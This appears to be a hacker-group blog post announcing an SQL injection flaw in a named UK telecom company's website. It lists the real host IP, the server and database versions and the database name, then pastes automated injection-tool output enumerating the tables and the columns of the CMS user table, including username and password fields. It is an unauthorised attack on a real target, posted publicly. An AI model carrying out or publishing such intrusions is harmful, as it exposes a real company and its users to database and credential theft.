Vulnerability found on UK Direct Telecom Website by Rwandan Hackers.UK Direct Telecom provides Services like wireless-communication, rent of communication equipments.
Vulnerable Website:-
http://www.direct-telecom-svs.
Vulnerable Link:-
http://www.direct-telecom-svs.
Database Back-end: MySQL 5.0.11
Web Technology: IIS6.0, ASP.NET, PHP 5.2.6
OS: Windows Server 2003
Database name: cmsdirect
Analyzing http://www.direct-telecom-svs.co.uk/
Host IP: 213.171.218.105
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
Keyword Found: Portables
Injection type is Integer
DB Server: MySQL
Selected Column Count is 3
Valid String Column is 1
Current DB: CMSDIRECT
Count(table_name) of information_schema.tables where table_schema=0x434D53444952454354 is 33
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x434D53444952454354 is 33
Table found: ACCESSORIES-090623
Table found: ACCESSORIES-090625
Table found: ACCESSORIES-090630
Table found: ACCESSORIES-090707
Table found: ACCESSORIES-FIXED-090707
Table found: ACCESSORIES
Table found: ACCESSORIES1
Table found: ACCESSORIES_USERS
Table found: BRANDS
Table found: BRANDS_USERS
Table found: CMS_BACKUP_USERS
Table found: CMS_LOGS
Table found: CMS_LOGS_USERS
Table found: CMS_USERS
Table found: COUNTRY
Table found: COUNTRY_USERS
Table found: ENQUIRIES
Table found: ENQUIRIES_USERS
Table found: EXPORT_USERS
Table found: GLOBALS
Table found: GLOBALS_USERS
Canceling...
Table found: HOMEBANNERS
Job Canceled!
Count(column_name) of information_schema.columns where table_schema=0x434D53444952454354 and table_name=0x434D535F5553455253 is 11
Column found: ID
Column found: USERNAME
Column found: PASSWORD
Column found: FULLNAME
Column found: EMAIL
Column found: AVATAR
Column found: ACCESS
No comments:
Post a Comment